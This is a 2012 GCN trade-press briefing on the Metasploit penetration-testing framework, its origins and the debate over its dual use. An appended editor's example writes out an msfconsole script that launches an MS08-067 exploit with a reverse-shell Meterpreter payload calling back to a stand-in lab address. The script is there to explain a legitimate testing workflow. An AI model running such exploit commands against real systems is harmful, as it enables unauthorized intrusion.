GCN : December 2012
[Briefing]

How zero-day exploits can improve security

The Metasploit Framework can be used for good or ill, but its purpose is to give the good guys the same tools the bad guys are already using. Metasploit has become a go-to platform for penetration testing and signature development, so much so that disclosures of new software vulnerabilities are often accompanied by a Metasploit exploit module.

The Metasploit Project is a computer security project that developed and maintains the Metasploit Framework for creating and executing exploit code. Available as a free open-source tool and in more sophisticated commercial products from Rapid7, it contains libraries of vulnerabilities and modules to exploit them. The framework lets developers and researchers build exploits to test for holes in IT systems, and its modularity allows different exploits and payloads to be combined.

Ostensibly a tool for penetration testing by good guys, Metasploit can be used for either good or evil. But its purpose is to democratize IT security, said H.D. Moore, who created Metasploit in 2003.

"It started out as more of a political thing than anything else," Moore said. At a time when only black hats had access to exploits and attack tools, white hat developers, researchers and security professionals were operating at a disadvantage. "The main goal was to put them all on the same footing."

Originally written in Perl and first released in late 2003, Metasploit has since been rewritten in Ruby. It is now in version 4.0 and contains about 900 exploit modules for Windows, Unix, Linux and Mac OS operating systems. It also contains several hundred modules for fuzzing, which can discover previously unknown or unsuspected vulnerabilities in a target.

A user selects a target machine, selects exploit modules to test for one or more vulnerabilities, selects the payloads for those exploits and launches them at the target. If the vulnerability is present, the exploit should get through and deliver its payload. Public-sector agencies are among those that have availed themselves of Metasploit's penetration testing tools, and it has also been used by agencies in red team/blue team exercises.

The framework allows creation of new exploit modules with a minimum of work, so Metasploit can keep up with the growing number of vulnerabilities. When zero-day exploits of a Java flaw were discovered in August, potentially affecting billions of devices, Metasploit developed an exploit for it and, after Oracle issued a patch, tested the patch against the exploit to confirm that the fix was effective.

The Metasploit Project was acquired by the security company Rapid7 in 2009. Commercializing Metasploit was something "that had been in the back of my mind forever," said Moore, who is now chief security officer at Rapid7. So Metasploit and Rapid7 hammered out a plan to allow commercial development while maintaining Metasploit's open-source availability. The Metasploit Community Edition remains an open-source tool with all the framework's functionality, available as a free download. Metasploit Express and Pro are commercial products built on the open-source core with additional bells and whistles to make them more user-friendly and scalable. All modules are available first in the open-source version.

What does the security community think of a tool that makes it easy for anybody, regardless of the color of his or her hat, to launch an attack?

"We did get a lot of pushback early on in the project," Moore said. But he points out that the bad guys already had tools for launching attacks. "The bad guys don't use Metasploit." Today almost all of the exploits in Metasploit modules have appeared in the wild first, so the availability of the tool is not a big advantage to attackers.

--- William Jackson

[datapoint] Where is big data in state CIOs' strategic planning? (chart; values not recoverable from this page) Response categories: Not in the plan at all, no plans to add it to the plan; We are discussing adding big data to the plan; In the plan indirectly; Addressed directly in the plan; A central part of the plan; Don't know/does not apply. Source: NASCIO, TechAmerica, Grant Thornton
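The four-step workflow the Briefing above describes (pick a target, pick an exploit module, pick a payload, launch) is what an msfconsole resource script captures. The script below is an added example written for this page, not code from the GCN article or from the Metasploit project. The module name, option names and the `check` command are as the editor recalls them from Metasploit 4.x and are not on the page; the 192.0.2.x addresses are constructed lab values from the documentation address range. It is run with `msfconsole -r lab.rc`.

```text
# Added example: msfconsole resource script (lab.rc), not from the article.
# Module/option names are from memory of Metasploit 4.x; addresses are constructed.

# 1. Select the exploit module to test for the vulnerability.
use exploit/windows/smb/ms08_067_netapi

# 2. Select the target machine (constructed lab address).
set RHOST 192.0.2.10

# 3. Select the payload and where it should call back to (constructed).
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.0.2.1
set LPORT 4444

# Practitioner's check before launching: many modules implement a
# non-destructive probe that reports whether the target appears
# vulnerable without delivering the payload.
check

# 4. Launch at the target; -j runs it as a background job so the
# console stays usable while the listener waits for a session.
exploit -j
```

Running `check` first is the caveat a tester wants: firing a memory-corruption exploit at a host that is already patched, or at the wrong host, can crash the service rather than return a session, which in a red team/blue team exercise is exactly the kind of collateral damage the rules of engagement usually forbid.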